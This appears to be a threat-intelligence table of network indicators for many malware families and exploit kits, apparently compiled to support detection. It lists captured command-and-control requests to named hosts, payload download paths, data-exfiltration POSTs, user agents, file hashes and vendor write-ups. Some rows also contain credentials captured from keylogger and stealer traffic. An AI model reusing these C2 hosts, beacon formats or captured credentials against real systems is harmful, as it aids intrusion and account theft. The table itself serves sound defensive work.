Nitedrem GET ...............2817324n-79s4-43q8-8n2n-676s3qr1ops5:............... ...............2817324n-79s4-43q8-8n2n-676s3qr1ops5:............... 80,88,99 508af8c499102ad2ebc1a83fdbcefecb http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en
Nitedrem GET /config.txt?&t=4593 /config.txt?&t= "User-Agent: Update
Host: in.onepiecedream.com:99
Cache-Control: no-cache" Update 80,88,99 508af8c499102ad2ebc1a83fdbcefecb http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en
Nitedrem GET /fish.jpg?&t=4426 /fish.jpg?&t= "User-Agent: Update
Host: www.dianwofacai.com
Cache-Control: no-cache" Update 80,88,99 508af8c499102ad2ebc1a83fdbcefecb http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en
Sality GET /?12da89=12355930 /?12da89= "User-Agent: KUKU v5.06exp =9355466431
Host: www.kjwre9fqwieluoi.info
Cache-Control: no-cache" KUKU v5.06exp =9355466431 CEAF4D9E1F408299144E75D7F29C1810 http://www.symantec.com/connect/blogs/all-one-malware-overview-sality
Sality GET /images/logos.gif?114bbc=9068000 /logos.gif? "User-Agent: KUKU v5.06exp =9355466431
Host: hayatspa.com
Cache-Control: no-cache" User-Agent: KUKU v5.06exp =9355466431 CEAF4D9E1F408299144E75D7F29C1810 http://www.symantec.com/connect/blogs/all-one-malware-overview-sality
Sality GET /setting.doc /setting.doc "Host: yahoo.com
Cache-Control: no-cache" CEAF4D9E1F408299144E75D7F29C1810 http://www.symantec.com/connect/blogs/all-one-malware-overview-sality
Torpig /Sinowal miniloader GET / "Host: 166.78.144.80
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Content-Length: 247
Connection: close" Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) 011C1CA6030EE091CE7C20CD3AAECFA0 http://blog.fox-it.com/2012/03/16/post-mortem-report-on-the-sinowallnu-nl-incident/
Torpig /Sinowal miniloader GET /search2?fr=altavista&itag=ody&q=b88d6ce7e9fe419788716298cc747adc%2C93a5d8146fea0bbb&kgs=1&kls=0 /search2?fr= "Content-Type: application/x-www-form-urlencoded
Host: annotatinggramma.info
Content-Length: 2804
Connection: Keep-Alive
Cache-Control: no-cache" 011C1CA6030EE091CE7C20CD3AAECFA0 http://blog.fox-it.com/2012/03/16/post-mortem-report-on-the-sinowallnu-nl-incident/
EK Popads GET /?7d456d68729292e9843cb9dde2d2f7b4=34 /? "/?7d456d68729292e9843cb9dde2d2f7b4=34
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://creditforums.com/discover-card/2648-why-so-hard-get-approved-discover-card.html
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: xrp.8taglik.info
Connection: Keep-Alive" "some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2" http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
EK Popads GET /4d23ccceb2cf9e6c1c91df06170259d3/32cdad27bdec4a68d8efc9bb835008e6.swf "Accept: */*
Accept-Language: en-US
Referer: http://qkvuz.12taglik.info/?82f98f39d50070ac6bccd765eb93b37e=y15&8d97baff25493bce238a6ac40dbd2dc1=perfectboys.org
x-flash-version: 11,7,700,202
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: qkvuz.12taglik.info
Connection: Keep-Alive" na "some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2" http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
EK Popads GET /855feed4acbb99c63ad7f25fef289284/decaff5b6ee641742f53d8ef8c6f9a16.jar "/855feed4acbb99c63ad7f25fef289284/decaff5b6ee641742f53d8ef8c6f9a16.jar
content-type: application/x-java-archive
accept-encoding: pack200-gzip,gzip
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_07
Host: fizv.11taglik.info
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive" na "some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2" http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
EK Popads GET /?c480cfaa684e1dc0db1b2e1f891d814a=a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in "/?c480cfaa684e1dc0db1b2e1f891d814a=a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: tqhsy.8taglik.info
Connection: Keep-Alive" na "some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot
CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2" http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
EK Popads GET /39ff9ff8c3b603d8eed017df64dd2799.eot "Accept: */*
Referer: http://fizv.11taglik.info/?0090c763e668fab7bbb1c5576207655f=q10&c561f8448a523af56b17eb9ac7ad7a58=sansit.in
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Host: fizv.11taglik.info
Connection: Keep-Alive" na TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/
Alina POS v5.6 POST /duck/push.php push.php "Accept: application/octet-stream
Content-Type: application/octet-stream
Connection: Close
User-Agent: Alina v5.6
Host: 208.98.63.226
Content-Length: 82
Cache-Control: no-cache" Alina v5.6 5A22ED78B6454E34217D07C4AF37B23B http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html
Alina POS v5.6 POST /adobe/version_check.php /version_check.php "Accept: application/octet-stream
Content-Type: application/octet-stream
Connection: Close
User-Agent: Alina v5.3
Host: 91.229.76.97
Content-Length: 2980
Cache-Control: no-cache" Alina v5.3 4c754150639aa3a86ca4d6b6342820be http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html
Alina POS v6.0 POST /adobe/version_check.php /version_check.php "Accept: application/octet-stream
Content-Type: application/octet-stream
Connection: Close
User-Agent: Alina v6.0
Host: 91.229.76.97
Content-Length: 3349
Cache-Control: no-cache" Alina v6.0 http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html
Hanove / Tourist POST /kamp.php /kamp.php "/kamp.php
Content-Type: multipart/form-data; boundary=78DDB5A902BB8FFF3F398B45BEDCD152 
User-Agent: SIMPLE
Host: http://[xxx] 
Content-Length: 501
Cache-Control: no-cache

--78DDB5A902BB8FFF3F398B45BEDCD152 
Content-Disposition: form-data; name=""uploaddir""
water/USER-6E3C3361930800270A87A2/D/ --78DDB5A902BB8FFF3F398B45BEDCD152 
Content-Disposition: form-data; name=""filename""; filename=""license_23_05_2004_08_10_00.txt"" 
Content-Type: text/plain Content-Transfer-Encoding: binary" SIMPLE 37207835e128516fe17af3dacc83a00c
Surtr 2nd Stage DL 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ "00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000000F0 00 00 00 00 00 00 00 03 af d7 a5 01 23 01 00 00 ........ ....#...
00000100 4a 00 00 00 78 9c 13 65 30 63 30 01 62 73 06 23 J...x..e 0c0.bs.#
00000110 06 0b 06 37 20 e9 06 84 26 0c 06 0c a4 02 00 a8 ...7 ... &......." 6178, 8089, 9696. "36E194F7DF2F2FD020E3800AB77F7E82 (2.tmp - payload)
8c06aec37c7e51f581aaa41f66d4ebad (RTF), 21aa9dd44738d5bf9d8a8ecf53c3108c or 21aa9dd44738d5bf9d8a8ecf53c3108c - Stage 2 dl" https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-community/
Surtr 2nd Stage DL 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ "<removed>
00000100 9c 13 00 00 00 00 00 00 00 50 0e 00 00 4d 5a 90 ........ .P...MZ.
00000110 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 ........ ........
00000120 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 .....@.. ........
00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000140 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba ........ ........
00000150 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 .....!.. L.!This
00000160 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 program cannot b
00000170 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 e run in DOS mod
00000180 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 36 31 e....$.. .....#61" 6178, 8089, 9696. "36E194F7DF2F2FD020E3800AB77F7E82 (2.tmp - payload)
8c06aec37c7e51f581aaa41f66d4ebad (RTF), 21aa9dd44738d5bf9d8a8ecf53c3108c or 21aa9dd44738d5bf9d8a8ecf53c3108c - Stage 2 dl" https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-community/
Surtr Initial GET 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ "00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
<removed>.
00000100 0a 00 00 00 64 00 00 00 00 00 00 00 00 00 ....d... ......" 6178, 8089, 9696. "36E194F7DF2F2FD020E3800AB77F7E82 (2.tmp - payload)
8c06aec37c7e51f581aaa41f66d4ebad (RTF), 21aa9dd44738d5bf9d8a8ecf53c3108c or 21aa9dd44738d5bf9d8a8ecf53c3108c - Stage 2 dl" https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-community/
Taleret GET / "/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mac.gov.skies.tw
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MCI=HHMHMBLHEHNLIOJRINRIJPRJIJ; MUID=ba2c08421000e9621000355b0000" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 443 "FED166A667AB9CBB1EF6331B8E9D7894
5328CFCB46EF18ECF7BA0D21A7ADC02C" http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader:Win32/Taleret.D#techdetails_link
Taleret GET /jw!Dyz0_2mTExQ0xbBnlp.RZcXoHmU- "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: tw.myblog.yahoo.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: B=8sah02d6on6k9&b=3&s=as" Mozilla/4.0 (compatible; MSIE 6.0; Win32) "FED166A667AB9CBB1EF6331B8E9D7894
5328CFCB46EF18ECF7BA0D21A7ADC02C" http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader:Win32/Taleret.D#techdetails_link
Sweet Orange EK GET /in.php?q=WPOChVXlw9QiOTwtCbg+uSk36elyOCiUwI99U0PYxA== /in.php?q= "/in.php?q=hPOChVXlw9QgOzotCb88uSk36elxMCiVxol9XkXXwg==
Accept: text/html, application/xhtml+xml, */*
Referer: http://techmedianet.com/server.php?fs=1&w=1280&h=800&q=hPOChVXlw9QgOzotCb88uSk36elxMCiVxol9XkXXwg==
Accept-Language: en-us
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: emberstat.com
Connection: Keep-Alive" User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) "http://urlquery.net/report.php?id=3120429
http://malforsec.blogspot.com/2013/03/making-orange-jam-analyzing-sweet.html"
ArcomRat / Dokstormac POST S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^] username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption [!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^] "S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^]username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption[!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^] 
" "
MSIE 7.0 for the file request" "1866
1888
1865
1890" "62B4C4432361C9B4B69C480C07AFA356
191FDC32304C50D9A054420E59BD21A9 
4015DD5B27EB612CA5DC320033E284C5" "http://www.threatexpert.com/report.aspx?md5=62b4c4432361c9b4b69c480c07afa356
http://www.symantec.com/security_response/writeup.jsp?docid=2012-112912-5237-99&tabid=2"
Ardamax keylogger SMTP "220 smtp.mail.yahoo.com ESMTP ready
EHLO DELLXT
250-smtp.mail.yahoo.com
" "220 smtp.mail.yahoo.com ESMTP ready
EHLO DELLXT
250-smtp.mail.yahoo.com
250-PIPELINING
250-SIZE 41697280
250-8BITMIME
250 AUTH PLAIN LOGIN XYMCOOKIE
AUTH LOGIN
334 VXNlcm5hbWU6
bGludXgwNjQwMEB5YWhvby5jb20=
334 UGFzc3dvcmQ6
YXplcnR5LzA2
235 2.0.0 OK
MAIL FROM:" 25 E33AF9E602CBB7AC3634C2608150DD18 http://www.ardamax.com/keylogger/
Matsnu - MBR wiping ransomware POST /f44/myse.php /myse.php "/f44/myse.php
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: twintrade.net
Content-Length: 344
Connection: Keep-Alive
Cache-Control: no-cache

IaTAREu1TfHHoUGCS/mqKHdWfz/L0PzKX8dpzjFoUfvV37klDPOn8KhS1lUdzm/J3kyOJugD4blZFNrw6+5lERjc0hbtCne95tSSWjACXP29rvfspXWDWDxKi17NkSh2x5eCYMIRqMeV8NZhUFtptnZ/gobO3nDnW31beGzC/0X/hzUAyb2Edpy87oPb3ohAup62JPQvqzOH3KLmS/MiVHkHo7Xv3XYHkagkLVGJJrHfhFl1tXpZIf8LOCwuAtOA5FuJC+VbkAgAaYux0Uz7w9kjxL/9jNq7G+g/UMlUwCO4ppEFvmCq/Ps3ElNe7k7IrTZ+uwn6FBCihp08muLj+A==" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 1B2D2A4B97C7C2727D571BBF9376F54F http://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-wipes-mbr-locks-screen/
Mutopy Downloader GET /d/conh11.jpg /conh11.jpg "/d/conh11.jpg
User-Agent: -
Host: gettrial.store-apps.org
Cache-Control: no-cache" User-Agent: - 80 20A6EBF61243B760DD65F897236B6AD3 http://www.deependresearch.org/2013/05/under-this-rock-vulnerable.html
Mutopy Downloader initial callback GET /protocol.php?p=3894120584&d=4fQm27CpL9m6oC7QvLZomrXyeYvptmyetaVE2deiLdi4 /protocol.php?p= "/protocol.php?p=3894120584&d=4fQm27CpL9m6oC7QvLZomrXyeYvptmyetaVE2deiLdi4
User-Agent: -
Host: www.wholists.org
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 18:56:53 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20

61 ..""...+.......o...4...o...w...t...z...5...4...t...*...|...u...o...~...)...i...h...;...4...o...k.." User-Agent: - 80 20A6EBF61243B760DD65F897236B6AD3 http://www.deependresearch.org/2013/05/under-this-rock-vulnerable.html
Symmi Remote File Injector GET "/img/seek.cgi?lin=100&db=dfs
/ae1.php
/ggu.php
/wp-content/gallery/28-juli-sundsore/options.php [wordpress url - varies]" /seek.cgi?lin= /ae1.php /ggu.php "/img/seek.cgi?lin=100&db=dfs
Accept: */*
User-Agent: Mozilla/5.0
Host: seek4.run-stat.org
Connection: Keep-Alive
Cache-Control: no-cache

/ae1.php
Accept: */*
User-Agent: Mozilla/5.0
Host: bt.ads-runner.org
Connection: Keep-Alive
Cache-Control: no-cache

/ggu.php
Accept: */*
User-Agent: Mozilla/5.0
Host: fw.point-up.org
Connection: Keep-Alive
Cache-Control: no-cache


/wp-content/gallery/28-juli-sundsore/options.php [wordpress url - varies]
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: [redacted victim wordpress cms]
Content-Length: 484
Connection: Keep-Alive
Cache-Control: no-cache

lJtdmf=T2tpZzk5b2tpZ10xY29rZW1xQntjam1tLGFtbw==&evtrKd=CQRLEdhQu&miOLST=b3ZjNCxjbzIse2NqbW1mbHEsbGd2&dMXEq=PldRR1A8aXBrcXZjXW9jZmZtej4tV1FHUDwIPkxDT0c8IElwa3F2YyJPY2ZmbXogPi1MQ09HPAg%2B [snip]" User-Agent: Mozilla/5.0 7958f73daf4b84e3b00e008258ea2e7a http://www.deependresearch.org/2013/05/under-this-rock-vulnerable.html
Matsnu - MBR wiping ransomware GET /inbox.php?ltype=ld&ccr=1&id=E81B90884C4C45445458&stat=0&ver=2000803&loc=0x0409&os=Windows%20XP /inbox.php?ltype=ld& "/0803&loc=0x0409&os=Windows%20XP
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: nvufvwieg.com
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914) 1B2D2A4B97C7C2727D571BBF9376F54F http://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-wipes-mbr-locks-screen/
Adware Hotbar POST /vic.aspx?ver=4.0.1158.0&rnd=595937 /vic.aspx?ver= "/vic.aspx?ver=4.0.1158.0&rnd=595937
Content-Type: application/x-www-form-urlencoded
Filename: gUcmpCp
User-Agent: NSIS_Inetc (Mozilla)
Host: b.compqueue.com
Content-Length: 276
Connection: Keep-Alive
Cache-Control: no-cache
epostdata=0c40ff4962816cc3e206edda1108327207ee080103baf1c6bb02c...." NSIS_Inetc (Mozilla) "e8022373bc452ab06c49752ce20c5cc2
e7f41ba37a3c57dd31de45f0c1f855a1
d689f23246bd49b01bd30b5926e992ba" http://threatcenter.crdf.fr/?More&ID=145956&D=CRDF.AdWare.AdWare.Win32.HotBar553635795
Blackhole v2 GET /7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a=1f&zg=c&tn=g&jopa=1658622 /q.php?kf= "/7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a=1f&zg=c&tn=g&jopa=1658622
User-Agent: Java/1.7.0_10
Host: bandirmacatiemlak.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive" User-Agent: Java/1.7.0_10
USteal.D 220---------- Welcome to Pure-FTPd ---------- "220---------- Welcome to Pure-FTPd ----------
220-You are user number 1 of 100 allowed.
220-Local time is now 14:57. Server port: 21.
220-This is a private system - No anonymous login
220 You will be disconnected after 15 minutes of inactivity.
USER 0jeck1072
331 User 0jeck1072 OK. Password required
PASS q1w2e3r433590
230-User 0jeck1072 has group access to: 1002" 21 2b796f11f15e8c73f8f69180cf74b39d http://blogs.technet.com/b/mmpc/archive/2013/05/22/how-easily-usteal-my-passwords.aspx
Hangover Smackdown Minapro GET /flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts=[PLATFORM]&mt=[account]&tr=[NoFiles]&Y1Y5F2 /snwd.php?tp= "Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: wreckmove.org
Connection: Keep-Alive" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)" "02d6519b0330a34b72290845e7ed16ab
bfd2529e09932ac6ca18c3aaff55bd79" http://enterprise.norman.com/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf
Cutwail / Pushdo POST /?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe /?ptrxcz_ /?xclzve_ "/?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 193
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: uakron.edu
Connection: Keep-Alive
Cache-Control: no-cache

g.P#...#...#...$..5$...$...$7S.$^.3%xQf%...%.O.%...&.Md&...&;L.&U..'o.H'...'...'...(..F(..
.2..(O..(.
........\+..p,.z...u)t.?>.-.p'+.<Z+.n.+.:.+...,.9X, ..,G7.,a.
-{.<-...-...-......:...m.>" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 582de032477e099eb1024d84c73e98c1 https://www.damballa.com/downloads/r_pubs/Damballa_mv20_case_study.pdf
Mediana Proxy GET /index.htm?n763t4OPmrs6fXq7fXp7uj16e-r&Length=0 /index.htm?n "Accept: */*
Accept-Language: en-us 
Pragma: no-cache 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: firewall.happytohell.com:80 
X-HOST: n763t4OPmrs6fXq7fXp7uj16e-r 
Content-Length: 0 
Proxy-Connection: Keep-Alive" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) ECA344925AA188E6A26BB4B2E09C783C
Zeus POST "/orders2010.php
/busted.php" /orders2010.php /busted.php "Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: mugspade.ru
Content-Length: 76
Cache-Control: no-cache

bn1=WIN7PRO_X86_000_74DEB1E36522DF69_26&sk1=C15CAF65F6280F4916AB79B669689A92
===========

Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: trapbath.ru
Content-Length: 894
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) b1551c676a54e9127cd0e7ea283b92cc
Gypthoy POST /opt/mainpage.php /mainpage.php "Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: sonunigam.us
Content-Length: 281
Connection: Keep-Alive
Cache-Control: no-cache

pcname=DELLXT&note=PO&country=&user=gurutoolz0803&log=%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0D%0AC%3A%5CWINDOWS%5Csystem32%5Ccmd.exe%0D%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0D%0A%0D%0A" User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) 3ee49121300384ff3c82eb9a1f06f288 http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=PWS%3AWin32%2FGypthoy.A#techdetails_link
Hupigon / Graybird ........................................;... Windows XP 5.1 (2600.Service Pack 3).......................... ......................................$...DELLXT.................................... .................................... ........................................... 4s.love.......HACK.. ........................................;...Windows XP 5.1 (2600.Service Pack 3)................................................................$...DELLXT.............................................................................................................................. 4s.love.......HACK.. 8000 8F90057AB244BD8B612CD09F566EAC0C
Variant Letsgo / TabMsgSQL downloader (comment crew) GET /index.htm /index.htm "User-Agent: IPHONE8.5(host:XPSP3-R93-Ofc2003SP2,ip:172.29.0.116)
Accept: */*
Host: mickeypluto.info
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 23:26:41 GMT
Content-Length: 131
Content-Type: text/html
Content-Location: http://mickeypluto.info/index.htm
Last-Modified: Mon, 18 Jul 2011 08:22:34 GMT
Accept-Ranges: bytes
ETag: ""ea835d82345cc1:15b981""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET 
<yahoo sb=""CcNQ03px5eovHIwYjIdfgRzFURpvH8fqL8mv0JTF5EOoUJx8t62VCX@@(25043)""></yahoo>" IPHONE8.5(host:XPSP3-R93-Ofc2003SP2,ip:172.29.0.116) b21ba443726385c11802a8ad731771c0 http://intelreport.mandiant.com/
Tapaoux GET /ol/yahoo/banner4.php?jpg=../yahoo /banner4.php?jpg=../yahoo "/ol/yahoo/banner4.php?jpg=../yahoo
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)
Host: re.policy-forums.org" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;) 60AF79FB0BD2C9F33375035609C931CB
Horst Proxy GET /socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0 /proxy.php?ip= "/socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0
User-Agent: Mozilla/5.0
Host: ldark.com

HTTP/1.1 302 Found
Date: Tue, 14 May 2013 02:49:49 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze15
Location: http://ww41.ldark.com/socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8" Mozilla/5.0 EFE5529D697174914938F4ABF115F762
PassAlert GET /loader/bin/file1.exe /bin/file1.exe "/loader/bin/file1.exe
User-Agent: Mozilla/5.0
Host: porno-video-free.com" Mozilla/5.0 B4A1368515C6C39ACEF63A4BC368EDB2
